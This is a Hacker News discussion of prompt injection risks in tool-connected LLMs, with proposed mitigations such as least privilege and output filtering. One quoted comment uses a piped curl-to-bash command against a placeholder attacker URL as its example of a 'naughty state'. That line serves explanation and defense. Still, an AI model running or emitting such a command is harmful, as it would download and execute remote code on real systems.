Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

I think this is a bigger issue than many imagine. If you think SQL injections are bad, imagine LLM injections where the LLM is connected to a system that can perform tasks such as emailing people.

Worse, mitigations for this are not at all obvious or guaranteed to work thanks to the probabillistic nature of LLMs.

LLM injections are probably more insidious than Spectre: there are probably a great many non-obvious ways to inject that we have only begun discovering.



How quickly we forget pandas becoming gibbons. https://www.popsci.com/byzantine-science-deceiving-artificia... The speed at which we are giving LLMs access to previously-secured systems feels irresponsible, but there's no time to feel things! Progress never stops, and so on.


Your link is 404 for me.



I believe that, when doing with these very large, general LLM's, there really is no practical way to protect from any 'injection' technique, short of actually removing certain strings from ever being completed by the LLM similar to as described here by andrej (which is still not really 100% unfortunately): https://colab.research.google.com/drive/1SiF0KZJp75rUeetKOWq...

*AI Safety:* What is safety viewed through the lens of GPTs as a Finite State Markov Chain? It is the elimination of all probability of transitioning to naughty states. E.g. states that end with the token sequence `[66, 6371, 532, 82, 3740, 1378, 23542, 6371, 13, 785, 14, 79, 675, 276, 13, 1477, 930, 27334]`. This sequence of tokens encodes for `curl -s https://evilurl.com/pwned.sh | bash`. In a larger environment where those tokens might end up getting executed in a Terminal that would be problematic. More generally you could imagine that some portion of the state space is "colored red" for undesirable states that we never want to transition to. There is a very large collection of these and they are hard to explicitly enumerate, so simple ways of one-off "blocking them" is not satisfying. The GPT model itself must know based on training data and the inductive bias of the Transformer that those states should be transitioned to with effectively 0% probability. And if the probability isn't sufficiently small (e.g. < 1e-100?), then in large enough deployments (which might have temperature > 0, and might not use `topp` / `topk` sampling hyperparameters that force clamp low probability transitions to exactly zero) you could imagine stumbling into them by chance."


The way I think about this is that we need to treat AIs as human employees that have a chance of going rogue, either because of hidden agendas or because they've been deceived. All the human security controls then apply: log and verify their actions, don't give them more privileges than necessary, rate limit their actions, etc.

It's probably impossible to classify all possible bad actions in a 100% reliable manner, but we could get quite far. For example detecting profanity should be as simple as filtering the output through a naive Bayesian classifier. Everything that's left would then be a question of risk acceptance.


That's a good point, we can always filter the output externally like SQL injection checking




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: